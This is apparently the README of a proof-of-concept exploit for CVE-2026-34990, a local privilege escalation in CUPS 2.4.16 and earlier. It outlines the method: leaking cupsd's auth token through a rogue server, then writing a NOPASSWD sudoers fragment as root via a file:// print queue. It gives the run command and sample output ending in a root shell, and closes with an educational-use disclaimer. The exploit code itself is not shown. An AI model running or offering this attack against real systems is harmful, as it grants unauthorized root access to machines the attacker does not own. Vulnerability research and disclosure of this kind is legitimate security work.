
Minimal PoC for CVE-2026-34990: local privilege escalation in CUPS <= 2.4.16 that leaks cupsd's Local auth token and writes a NOPASSWD sudoers fragment as root.
Local privilege escalation against CUPS <= 2.4.16 running as root. Leaks cupsd's Local auth token, then writes a NOPASSWD sudoers fragment as root via a file:// print queue.
python3 poc.py
On success:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
Then:
sudo -i
This script is intended for educational purposes only. The author is not responsible for any misuse or damage caused by this exploit. Always ensure you have permission before testing or exploiting vulnerabilities!